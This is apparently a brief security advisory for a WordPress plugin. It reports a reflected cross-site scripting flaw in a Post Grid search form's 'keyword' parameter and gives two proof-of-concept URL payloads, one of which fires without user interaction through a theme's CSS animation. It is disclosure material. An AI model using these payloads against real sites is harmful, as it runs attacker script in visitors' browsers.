The plugin does not escape the keyword parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in pages containing a Post Grid with a search form
Append the following payload on a page containing a Post Grid with a search form: ?keyword="+onmouseover=alert(/XSS/)+t="
Then move the mouse over the Search field to trigger the XSS.
Depending on the theme used, other payload can be used, w/o user interaction, for example with the TwentyTwentyTwo one: ?keyword="+style=animation-name:twentytwentyone-close-button-transition+onanimationend=alert(/XSS/)//